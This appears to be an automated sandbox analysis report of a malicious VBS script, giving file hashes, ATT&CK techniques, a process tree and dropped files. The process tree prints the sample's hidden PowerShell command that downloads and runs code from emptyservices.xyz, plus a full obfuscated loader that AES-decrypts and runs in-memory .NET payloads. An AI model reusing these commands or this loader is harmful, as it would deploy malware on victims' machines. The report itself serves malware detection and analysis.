799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be

General

Target

799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs
Size

78KB
MD5

f4360392014f0bebc78d81bbf8b1bfec
SHA1

275ddf9b03cc98e1f0d599140e19c64d5a941fd9
SHA256

799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be
SHA512

bfeded4bf8bd4e82226ec0b3b3abb7dfd9d328ce1216004bdd47bf997f3058a8cf8a5973ef4e01979dbfdb71cc2c9f73a731f70e58eec2106208d7dc08000a79
SSDEEP

1536:xO6AlDEJYMg1Z0BYBOMadTFA63RI3xMpFgLTljdKCHBlok:kblQJYZ1Z2YBLT2mSpFg6iEk

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2352	powershell.exe
2720	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2352	powershell.exe
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2352	2508	WScript.exe	30
PID 2508 wrote to memory of 2352	2508	WScript.exe	30
PID 2508 wrote to memory of 2352	2508	WScript.exe	30
PID 2508 wrote to memory of 2608	2508	WScript.exe	33
PID 2508 wrote to memory of 2608	2508	WScript.exe	33
PID 2508 wrote to memory of 2608	2508	WScript.exe	33
PID 2608 wrote to memory of 2672	2608	cmd.exe	35
PID 2608 wrote to memory of 2672	2608	cmd.exe	35
PID 2608 wrote to memory of 2672	2608	cmd.exe	35
PID 2608 wrote to memory of 2720	2608	cmd.exe	36
PID 2608 wrote to memory of 2720	2608	cmd.exe	36
PID 2608 wrote to memory of 2720	2608	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
67fdaf4f143ad3cdab6f3c542076b194

SHA1
8a7474470f2c47e3f301aef70da5ef415c38cff2

SHA256
f10e4792e78f14998d0334d5d35b5efa825581c917a80e6d8ee096ee714e0c7e

SHA512
64d68d7e8dbad526a2d4d09f4a3ba8b2a28a97a79123ad303c3aea39be8652fc2ad9fdc3f85ddbf68c0713e6186b8219774cd6c46cf90ac3f6a61711b62939e4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c5b739739736a26c3131bda9aeb5672e

SHA1
2599d10ae19c83de1cbdbe076d30f97709ea5973

SHA256
d7ceea1257e202a98e6cabcefc69db0b3959bd3eae8a2eb58a75f240f9ee5eb6

SHA512
3ff5ee88ae245211a2b96ce90fa094a99eee7ee3a24dfef1993ca3af81bb36600c885158c41c364df591730e9246465fea615c62c14fbd084e0f93a432a260f9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CTMMHJVEKP7S6HC95YKP.temp

Filesize
7KB

MD5
6c29942c9793ac444bd8b335442495f8

SHA1
258128a45060dfc96776091d4f24be39abc1008c

SHA256
65df0b174217978ff494a51ae1b8666cac56ff562f3c8b7ab7cb85a63fc86473

SHA512
10aece78ebc5d553755cff5a00b819032166dbc156ce19566c2e5af1da56cfb4b2ddaf314fd324cd957c9dec4727c4e15805c2a0742455fa91a4cfb24daeb952

Download Submit
memory/2352-8-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-10-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-9-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-11-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-12-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-7-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2352-4-0x000007FEF52CE000-0x000007FEF52CF000-memory.dmp

Filesize
4KB

Download
memory/2352-6-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

Filesize
9.6MB

Download
memory/2352-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2720-28-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/2720-29-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing